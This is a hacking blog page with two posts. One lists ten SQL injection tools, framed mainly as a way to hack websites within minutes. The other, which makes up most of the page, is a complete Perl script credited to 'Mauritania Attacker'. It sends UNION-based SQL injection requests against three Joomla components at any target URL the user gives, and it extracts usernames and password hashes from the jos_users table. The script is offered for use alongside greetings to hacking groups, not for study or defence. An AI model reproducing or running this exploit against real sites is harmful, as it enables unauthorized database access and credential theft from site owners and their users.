Affichage des articles dont le libellé est sqli exploiter. Afficher tous les articles
Affichage des articles dont le libellé est sqli exploiter. Afficher tous les articles

Top 10 Sql injection tools for hackers

Many websites are vulnerable to a common and famous vulnerability known as "SQL",nowadays security experts are protecting the website from this vulnerability.SQL vulnerability is common vulnerability which almost every script kidde knows,once you got website with SQL vulnerability then you can easily hack website within some minutes.there are two types sql injection attack
1.Automatic SQL injection(in automatic sql injection ,we attack on website with the help of  SQL injection tools)
2.Manual SQL injection(in manual sql injection,we attack on website manually with some mysql codes)
Here we will discuss about top 10 SQL injection tools
 1).BSQL HACKER

  
2)THE MOLE


3)PANGOLIN


4)SQL MAP


5)HAVIJ




6)ENEMA SQLI


7)SQLNINJA


8)SQLSUS


9)SAFE SQL INJECTOR
 

10) SQL POIZON

These tools are also used for white hacking(penetesting).Those who don't know know about sql injection can watch video shown below



meet hackers
www.meethackers.com
Read more

by Malik korrich ~ lundi 29 décembre 2014 0 commentaires

[PERL] Joomla Sqli Exploiter v 1.0 by mauritania attacker 2014

                        [PERL] Joomla Sqli Exploiter v 1.0 by mauritania attacker




#!/usr/bin/perl
use IO::Socket::INET;
use LWP::UserAgent;
system("clear");
print "------------------------------------------------------------------------\n";
print "########################################################################\n";
print "#                         Joomla SQli 1.0 Exploiter                    #\n";
print "#                      *Coded by Mauritania Attacker*                  #\n";
print "# Greetz: AnonGhost - Mauritania HaCker Team - Procoder'z Team Albania #\n";
print "########################################################################\n";
print "------------------------------------------------------------------------\n\n";
$target = $ARGV[0];
$component = $ARGV[1];
if($target eq '' || $component eq '')
{
print "Usage: ./exploit.pl \n";
print "-----------------------------------\n";
print " Available Exploits :              \n";
print " 1- Joomla Component RSfiles       \n";
print " 2- Joomla General Sql Injection   \n";
print " 3- Joomla Component JEvents       \n";
print "-----------------------------------\n";
print " Example: ./exploit.pl http://www.site.com/ 1 \n\n";
exit(1);
}

open(FILE, "> contents11.txt");

if($target !~ /http:\/\//)
{
$target = "http://$target";
}

sleep 1.5;
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');


if($component == 1)
{
$host = $target . "/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--";
print " . . Exploiting Component RSfiles on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}








if($component == 2)

{
print " . . Exploiting General Sql Injection on target $target . . \n\n";
sleep 1;
print " . . Trying different types of injection for this component . . wait please . . \n\n";
$host = $target . "/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*";
$host1 = $target . "/index.php?option=com_commedia&format=raw&task=down&pid=59&id=999999.9 union all select (select concat(0x3c757365723e, username,0x3c757365723e3c706173733e,count(*),password,0x3c706173733e) from jos_users),null--";



@hosts = ($host,$host1);
foreach $hos(@hosts)
{
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$hos));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "Password found --> $password :) . \n\n";
sleep 1;
}
else
{
print "Password not found :( . \n\n";
sleep 1;
}
}
}










if($component == 3)

{
print " . . Exploiting Component JEvents on target $target . . \n\n";
sleep 1;
print " . . Trying different types of injection for this component . . wait please . . \n\n";
$host = $target . "/index.php?option=com_events&task=view_detail&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";
$host1 = $target . "/index.php?option=com_events&task=view_year&Itemid=50&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";
$host2 = $target . "/index.php?option=com_events&Itemid=34&task=view_year&month=11&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";


@hosts = ($host,$host1,$host2);
foreach $hos(@hosts)
{
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$hos));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "Password found --> $password :) . \n\n";
sleep 1;
}
else
{
print "Password not found :( . \n\n";
sleep 1;
}
}
}


By Mauritania attacker
meet hackers
www.meethackers.com
Read more

by Malik korrich ~ jeudi 3 juillet 2014 0 commentaires

« Articles plus anciens